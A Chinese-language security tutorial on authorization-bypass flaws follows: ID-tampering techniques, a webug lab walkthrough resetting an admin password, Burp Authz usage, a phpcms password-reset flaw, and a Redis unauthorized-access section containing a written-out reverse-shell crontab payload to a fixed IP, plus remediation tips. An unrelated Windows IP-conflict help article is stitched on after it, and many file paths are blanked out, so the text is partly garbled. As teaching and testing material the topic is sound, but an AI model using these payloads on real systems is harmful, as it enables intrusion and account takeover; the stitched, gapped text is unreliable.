2.2 基于用戶ID的越權(quán)

舉個(gè)例子：

https://www.xxx.com/user1/userinfo.php?user_id=user1https://www.xxx.com/user1/userinfo.php?user_id=10001

我們登陸某個(gè)系統(tǒng)后，看到某些功能上獲取信息的方式類似于上鏈接時(shí)，可以初步判斷獲取信息的方式為根據(jù)user_id來獲對(duì)應(yīng)的用戶信息，如果參數(shù)為用戶名，我們可以收集用戶名字典來枚舉信息，根據(jù)返回值判斷是否存在問題。當(dāng)然如果枚舉較大，系統(tǒng)用戶數(shù)量又不是很多的情況下，可以嘗試注冊新用戶，利用新用戶的用戶名來測試是否可以獲取到用戶信息。

如果參數(shù)為一個(gè)固定的數(shù)字串時(shí)，遍歷數(shù)字串即可，這種情況下是系統(tǒng)對(duì)每個(gè)注冊用戶進(jìn)行了一個(gè)用戶id的排序，在眾多的開源CMS上都有使用，當(dāng)然這個(gè)字符串也有可能是隨機(jī)，如果是隨機(jī)的，量不大的情況下可以采用遍歷的形式獲取，量較大可以利用burp的隨機(jī)數(shù)爆破，或者同樣自己注冊賬戶來測試。

2.3基于功能對(duì)象ID的越權(quán)

舉個(gè)例子：

https://www.xxx.com/user1/userticket.php?user_order=100001https://www.xxx.com/user1/userticket.php?user_order=49ba59ab

此問題大量存在于用戶訂單、購買、查詢等功能的商家CMS上，例如以上地址，如果是訂單編號(hào)，那么我們可以嘗試遍歷訂單地址來查詢是否存在越權(quán)。如果編號(hào)并不是單純的訂單數(shù)字串，而是類似如上的編碼字符串，相信自己的運(yùn)氣的話可以嘗試某些編碼的情況，例如BASE64、MD5。猜測不到，或者不能明顯的看出來是如何做的處理，注冊新賬號(hào)重新下單，會(huì)是簡單方便的選擇。

2.4基于上傳文件對(duì)象ID的越權(quán)

舉個(gè)例子：

https://www.xxx.com/user1/userfile.php?fileid=10001https://www.ccc.com/user1/userfile.php?fileid=user1_name.jpg

這種上傳文件后，可以越權(quán)查看其他用戶的上傳文件也是經(jīng)常發(fā)現(xiàn)類似的問題。假設(shè)，系統(tǒng)要求我們上傳個(gè)人的身份證，實(shí)名認(rèn)證信息、購買的發(fā)票訂單等。如果上傳后看到類似如上地址，可以猜測此上傳文件可以遍歷獲取，通過查詢fileid來查看其他用戶的上傳信息。如果上傳后文件名如第二種，可能此文件是系統(tǒng)經(jīng)過重命名的，重命名的方式一般采用當(dāng)前上傳的時(shí)間戳或者當(dāng)前上傳的日期加隨機(jī)字段，這種情況下枚舉較為困難，但仍然可以采用注冊新用戶的方式來查看是否存在越權(quán)。順便一問，如果是獲取信息的方式，還可能會(huì)有什么問題呢？

2.5基于未授權(quán)訪問的越權(quán)

舉個(gè)例子：

https://www.xxx.com/user1/user.php?user=user1@user.com

在一些系統(tǒng)上登陸用戶后，可以看到類似如上的地址鏈接，可能你會(huì)覺得這個(gè)跟問題1類似，但是也有可能多一張問題情況，在非登陸的情況下仍然可以訪問到詳細(xì)信息。如果可以，則證明后端對(duì)身份的效驗(yàn)只是基于參數(shù)user，并沒有效驗(yàn)用戶的session是否已登陸。此問題曾發(fā)現(xiàn)于一個(gè)系統(tǒng)后端支付訂單復(fù)核的功能中，問題可想而知。

2.6基于功能地址的越權(quán)

舉個(gè)例子：

https://www.xxx.com/user/getuserinfo.php

如上地址，正常情況下，只訪問此后臺(tái)地址時(shí)，一般會(huì)跳轉(zhuǎn)到登陸地址，或者登陸后用來查看某個(gè)具體的功能，獲取數(shù)據(jù)的情況根據(jù)訪問的鏈接地址來，理論上此功能并不存在越權(quán)可能，因?yàn)闆]有我們可以修改的參數(shù)。但是對(duì)權(quán)限及功能的限制可能只局限于用戶菜單的限制，根據(jù)常用鏈接，可以猜測是否存在以下地址：

/.php

/adduser.php

/deluser.php

/.php

/.php

/.php

......

因?yàn)樵诮^大部分系統(tǒng)中，開發(fā)為了方便區(qū)別功能和頁面，通常會(huì)利用對(duì)應(yīng)的英文來命名文件，但這些文件并不是任意用戶都可以訪問到的，所以可以猜測訪問地址是否英文的拼接來猜測路徑。對(duì)于此問題的快捷測試是獲取一個(gè)高權(quán)限賬號(hào)，當(dāng)然對(duì)于未授權(quán)測試來說，很難實(shí)現(xiàn)。

2.7基于接口身份的越權(quán)

舉個(gè)例子：

https://www.xxx.com/user/userinfo.phppost: {'userid':'10001','username':'name','userage':'18','usermobile':'18080808888'}

例如如上接口，修改用戶信息，當(dāng)我們點(diǎn)擊某個(gè)系統(tǒng)的修改自身資料時(shí)，會(huì)發(fā)送一個(gè)類似的json數(shù)據(jù)包，其中userid對(duì)應(yīng)我們自己的用戶id，修改后，可以修改對(duì)應(yīng)id的用戶資料。修改方式類似問題1。區(qū)別在于一個(gè)頁面可見，一個(gè)頁面不直觀可見，一個(gè)查詢，一個(gè)修改。需要配合其他越權(quán)查詢漏洞，或者賬號(hào)來識(shí)別是否修改成功。

3. 漏洞靶場測試

漏洞環(huán)境：，webug4.0

靶場介紹：國產(chǎn)靶場，漏洞齊全，演示也相當(dāng)完善。其中還分為初，中，高。雖然高好像沒東西，但仍然是一個(gè)不錯(cuò)的靶場環(huán)境。

漏洞演示：演示為靶場的22號(hào)漏洞，越權(quán)修改密碼

靶場安裝：，本來也給了一個(gè)vm的安裝環(huán)境，但是那個(gè)百度云打不開了。就直接用文件自己安裝，也沒找到安裝教程，就摸索著如下安裝了。

把sql目錄中的文件安裝到數(shù)據(jù)庫，新建三個(gè)按照文件名的數(shù)據(jù)庫，導(dǎo)入數(shù)據(jù)文件，修改data目錄下的和dbconn文件，修改為自己的數(shù)據(jù)庫賬號(hào)密碼和數(shù)據(jù)庫名。修改完成后建議把網(wǎng)站目錄修改為webug的目錄下。直接訪問本地地址即可。

另外需要修改/control//.php文件下的一段代碼，不然跳轉(zhuǎn)到錯(cuò)誤路徑：

header("Location:/pt_env/control/auth_cross/cross_auth_passwd2.php?id={$id}")修改為：header("Location:/control/auth_cross/cross_auth_passwd2.php?id={$id}")

點(diǎn)擊第一個(gè)越權(quán)修改密碼后進(jìn)入如下頁面：

此處我打開了數(shù)據(jù)庫來對(duì)應(yīng)查看修改密碼的情況，打開webug數(shù)據(jù)庫下的表，可以看到其中有兩個(gè)用戶如下：

此處利用aaaaa用戶修改admin用戶密碼，利用aaaaa賬戶登陸后，看到如下界面

此處，我們可以先正常走一遍邏輯來查看其中的數(shù)據(jù)包情況，把a(bǔ)aaaa的密碼修改為aaaaa，彈窗OK。然后查看抓取到的數(shù)據(jù)包。

其中有舊密碼和新密碼兩個(gè)參數(shù)，理論上如果效驗(yàn)了舊密碼和賬號(hào)的一致性，就算鏈接中的id可以修改越權(quán)也無法修改密碼，會(huì)提示舊密碼不正確，但此處并沒有效驗(yàn)舊密碼和賬號(hào)的一致性，導(dǎo)致修改鏈接中的2為1，post參數(shù)不變，或者任意舊密碼值，便可以修改admin的密碼。

查看數(shù)據(jù)庫修改是否成功：

此處的問題存在兩點(diǎn)，一是修改的用戶身份由鏈接中的ID來決定，二是沒有對(duì)舊密碼和賬戶進(jìn)行身份驗(yàn)證。

4. 工具測試

對(duì)于越權(quán)類的安全問題，并沒有自動(dòng)化測試工具來發(fā)現(xiàn)和識(shí)別，至少現(xiàn)在沒有發(fā)現(xiàn)哪里有完善的越權(quán)檢測工具和掃描器。

此處介紹一款burp的越權(quán)插件，輔助檢測越權(quán)漏洞，但是只能檢測基于功能的越權(quán)，并不能自動(dòng)的檢測需要修改參數(shù)來判斷越權(quán)形式的漏洞。

在burp的選項(xiàng)中選擇BApp Store選項(xiàng)卡，找到Authz插件，點(diǎn)擊install。安裝完成后選項(xiàng)卡中會(huì)出現(xiàn)一個(gè)Authz的新選項(xiàng)卡，界面如下：

此處需要兩個(gè)用戶身份，假設(shè)為A用戶和B用戶，登陸A用戶的賬號(hào)，獲取Cookie到new header中，使用B賬號(hào)抓包獲取信息。到proxy中選擇需要測試的功能地址，右鍵到Send to Authz。

獲取夠需要測試的功能后，到Authz界面點(diǎn)擊run即可運(yùn)行，此處沒有設(shè)置cookie，那么將按照未授權(quán)訪問來測試。

其中，會(huì)在請求中替換我們輸入的cookie值，如圖顯示，源請求的字節(jié)長度，請求的字節(jié)長度，源請求的響應(yīng)碼，請求的響應(yīng)碼，通過對(duì)響應(yīng)的差別來查看是否存在越權(quán)漏洞。

能達(dá)到此檢測目的的還有一款插件，也同樣可以檢測越權(quán)，功能強(qiáng)勁，使用較Authz復(fù)雜，對(duì)于高要求，多用戶，需要對(duì)請求中的token等進(jìn)行選擇替換的，可以使用此插件。

介紹地址：

5. CMS演示5.1前臺(tái)任意修改其他用戶信息

漏洞環(huán)境：，phpcms9.5.9

漏洞介紹：phpcms設(shè)計(jì)缺陷導(dǎo)致前臺(tái)用戶可以任意修改其他用戶密碼

漏洞下載：

解壓安裝到，訪問后需要安裝，按照安裝要求，填入賬號(hào)密碼。等待安裝完成，將自動(dòng)跳轉(zhuǎn)到后臺(tái)管理頁面。登陸后臺(tái)需要先添加郵箱認(rèn)證，如下添加的騰訊郵箱。具體騰訊授權(quán)碼獲取方式可以查看：

在用戶模塊中添加如下信息，新增兩個(gè)測試用戶，類似如下，需要其中一個(gè)可以接收郵件。

在站點(diǎn)首頁點(diǎn)擊登陸處，如果跳轉(zhuǎn)到404安裝頁面，可能是你沒有刪除install安裝目錄，刪除訪問index.php即可。選擇忘記密碼->用戶名找回密碼

點(diǎn)擊獲取郵箱校驗(yàn)碼

返回上一步輸入想修改的用戶，如下test2

輸入之前的郵箱驗(yàn)證碼提交

點(diǎn)擊后顯示密碼修改成功為以下：

嘗試使用新密碼登陸成功：

漏洞修復(fù)：此問題出現(xiàn)原因在于驗(yàn)證碼沒有跟賬號(hào)做綁定，驗(yàn)證時(shí)只做了驗(yàn)證碼是否有效的判斷。對(duì)于此類問題，頻繁出現(xiàn)在手機(jī)號(hào)驗(yàn)證碼，郵箱驗(yàn)證碼處，在最后執(zhí)行修改時(shí)需要一同驗(yàn)證，驗(yàn)證碼和手機(jī)或者郵箱的對(duì)應(yīng)關(guān)系。

5.2redis未授權(quán)訪問

漏洞環(huán)境：Ubuntu，reids 3.2.0

漏洞介紹：Redis因配置不當(dāng)可以未授權(quán)訪問。攻擊者無需認(rèn)證訪問到內(nèi)部數(shù)據(jù)，可導(dǎo)致敏感信息泄露，也可以寫入文件來反彈shell

安裝如下：

wget

tar xzf redis-3.2.0.tar.gz

cd redis-3.2.0

make

修改配置文件

vi?redis.conf
bind?127.0.0.1?加上#
protected-mode?yes??改為no

在配置文件目錄下啟動(dòng)

./src/redis-server redis.conf

啟動(dòng)后顯示如下：

通過reids命令可以查看基本信息

嘗試反彈shell到指定地址

set x "\n* * * * * bash -i >& /dev/tcp/192.168.30.79/2333 0>&1\n"config set dir /var/spool/cron/config set dbfilename rootsave

或者采用gopher協(xié)議，直接利用curl一條命令執(zhí)行

6. 漏洞修復(fù)

1、驗(yàn)證需要從前端獲取的參數(shù)，比如用戶ID和角色權(quán)限名，對(duì)于需要根據(jù)前臺(tái)請求來返回?cái)?shù)據(jù)的參數(shù)進(jìn)行權(quán)限效驗(yàn)。

2、對(duì)于固定返回信息可以使用特定鏈接地址返回，同時(shí)采用不可預(yù)測地址，如：.php

3、對(duì)于需要修改、新增等功能進(jìn)行判斷，根據(jù)當(dāng)前seesion判斷用戶，參數(shù)中只傳輸修改的用戶信息。

4、區(qū)分用戶和管理員時(shí)，不采用某些相同的參數(shù)來區(qū)別。如dede區(qū)分管理和用戶都是采用ID值，容易產(chǎn)生問題。

5、對(duì)于查詢類越權(quán)需要對(duì)每一次請求的參數(shù)做當(dāng)前用戶身份校驗(yàn)，避免水平越權(quán)。

ip地址與網(wǎng)絡(luò)上的其他系統(tǒng)有沖突怎么辦

ip地址與網(wǎng)絡(luò)上的其他系統(tǒng)有沖突怎么辦

ip地址與網(wǎng)絡(luò)上的其他系統(tǒng)有沖突解決方法如下：

方法一：IP地址與網(wǎng)絡(luò)上的其它系統(tǒng)有沖突，設(shè)置成為由DHCP自動(dòng)獲取

出現(xiàn)您所描述的錯(cuò)誤提示，應(yīng)該是網(wǎng)卡所設(shè)置的IP地址與網(wǎng)絡(luò)上的另外一臺(tái)電腦，或者其他網(wǎng)絡(luò)設(shè)備的IP地址發(fā)生沖突，所謂沖突也就是使用了相同的地址，錯(cuò)誤提示中的00:20:ED:9E:55:B6就是另外那臺(tái)電腦或者網(wǎng)絡(luò)設(shè)備的MAC地址。

如果您的電腦在一個(gè)局域網(wǎng)內(nèi)，并且網(wǎng)卡IP地址是通過局域網(wǎng)的服務(wù)器自動(dòng)分配的，在Windows 2000等操作系統(tǒng)上，可以單擊“開始”按鈕，選擇“附件”中的“命令提示符”，在命令行狀態(tài)下輸入“ /renew”，讓系統(tǒng)釋放當(dāng)前的IP地址，重新獲得一個(gè)新的地址。在Windows 98中，則可以單擊“開始”按鈕，選擇“運(yùn)行”，鍵入“”，并在出現(xiàn)的對(duì)話框上選擇釋放當(dāng)前IP，然后重新獲取一個(gè)。若您的IP地址是設(shè)置為固定IP地址的，如果是您自己設(shè)置的，可以另外設(shè)置一個(gè)，如果是由管理員分配的，那么您需要聯(lián)系管理員，報(bào)告IP地址沖突的問題，要求更換IP地址或找出產(chǎn)生沖突的電腦進(jìn)行修正。

如果您在單機(jī)情況下使用電腦，那么您需要檢查自己所使用的設(shè)備中哪一個(gè)設(shè)備是沖突的原因，例如ADSL調(diào)制解調(diào)器的IP地址是否與您的網(wǎng)卡IP地址相同等。

IP地址在每個(gè)網(wǎng)絡(luò)中只能是唯一的，如果重復(fù)了則發(fā)生IP沖突，就無法正常連入網(wǎng)絡(luò)了。你可以手動(dòng)進(jìn)行修改,步驟如下:

在或中：

單擊開始--設(shè)置--網(wǎng)絡(luò)和撥號(hào)連接，在出現(xiàn)的網(wǎng)絡(luò)和撥號(hào)連接窗口中右鍵單擊“本地連接”，在出現(xiàn)的快捷菜單里選擇“屬性”命令，出現(xiàn)“本地連接”屬性對(duì)話框，在“常規(guī)”選項(xiàng)卡中，中間的“此連接使且下列組件”列表框，選中“協(xié)議(TCP/IP)”單擊“屬性”按鈕，在出現(xiàn)的“協(xié)議(TCP/IP)屬性”對(duì)話框中選擇“常規(guī)”選項(xiàng)卡中的“使用下列IP地址”單選按鈕，然后就可以在下面的文本框中填寫需要的IP地址，子網(wǎng)埯碼及默認(rèn)網(wǎng)關(guān)了。

這時(shí)，如果本來你用的就是手動(dòng)設(shè)置IP地址的話，你就會(huì)看到這幾項(xiàng)中已經(jīng)填入了數(shù)據(jù)，那么你就不用改那么多了，只要修改IP地址框中，最后一個(gè)點(diǎn)后面的數(shù)字就可以。但是，如果你以前用的是自動(dòng)獲得IP地址的話，那么就需要向網(wǎng)絡(luò)管理員咨詢了，咨詢的內(nèi)容包括，IP地址的范圍，子網(wǎng)掩碼、默認(rèn)網(wǎng)關(guān)，DNS服務(wù)器的IP地址。

方法二：查看網(wǎng)絡(luò)連接-屬性

查看網(wǎng)絡(luò)連接-屬性-TCP/IP屬性-使用固定IP上網(wǎng),IP最好填你原來自動(dòng)分配的IP地址,這樣不至于造成與別人的沖突。

方法三：從運(yùn)行中設(shè)置

步驟1 如果您使用的計(jì)算機(jī)的操作系統(tǒng)是：windows 98

點(diǎn)擊左下角“開始”→“運(yùn)行”，鍵入：，點(diǎn)擊“確定”，在彈出的窗口中，點(diǎn)擊“全部釋放”，然后點(diǎn)擊“全部更新”，即可解決問題。

如果系統(tǒng)提示無法更新，則需要重新啟動(dòng)計(jì)算機(jī)。

步驟2 如果您使用的計(jì)算機(jī)的操作系統(tǒng)是：windows 2000 或windows XP

步驟3 點(diǎn)擊左下角“開始”→“運(yùn)行”，鍵入： /release，點(diǎn)擊“確定”，在此點(diǎn)擊“開始”→“運(yùn)行”，鍵入： /renew，點(diǎn)擊“確定”，即可解決問題。

方法四：這是ARP病毒的跡象。

ip地址與網(wǎng)絡(luò)上的其他系統(tǒng)有沖突怎么辦？ARP病毒病毒發(fā)作時(shí)候的特征為，中毒的機(jī)器會(huì)偽造某臺(tái)電腦的MAC地址，如該偽造地址為網(wǎng)關(guān)服務(wù)器的地址，那么對(duì)整個(gè)網(wǎng)絡(luò)均會(huì)造成影響，用戶表現(xiàn)為上網(wǎng)經(jīng)常瞬斷。

注意：如果遇到“本地連接受限制或無連接”導(dǎo)致無法上網(wǎng)小編已為大家提供了解決辦法